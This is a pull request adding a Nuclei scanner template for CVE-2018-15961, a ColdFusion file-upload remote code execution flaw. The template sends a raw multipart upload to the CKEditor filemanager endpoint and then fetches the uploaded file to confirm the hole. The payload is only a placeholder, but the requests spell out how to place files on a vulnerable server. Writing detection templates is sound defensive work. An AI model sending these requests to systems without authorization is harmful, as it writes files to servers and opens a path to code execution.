### PR TITLE
Creates CVE-2018-15961

### DIFF
--- a/cves/2018/CVE-2018-15961
+++ b/cves/2018/CVE-2018-15961
@@ -1,0 +1,40 @@
+info:
+  name: CVE-2018-15961
+  author: SkyLark-Lab, ImNightmaree
+  severity: critical
+  tags: server,cve,cve2018,rce,coldfusion,fileupload
+  
+requests:  
+  - raw:
+     - |
+        POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------24464570528145
+
+        -----------------------------24464570528145
+        Content-Disposition: form-data; name="file"; filename="{{randstr}}"
+        Content-Type: image/jpeg
+
+        %%%%%%%%
+        -----------------------------24464570528145
+        Content-Disposition: form-data; name="path"
+
+        {{randstr}}
+        -----------------------------24464570528145--
+
+
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "{{randstr}}"
+          
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

Closes #3119 with minor updates to ensure the file isn't accessible predictably.

- Added CVE-2018-15961
- References:

### Template Validation

I've validated this template locally?
- [ ] YES
- [ ] NO

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)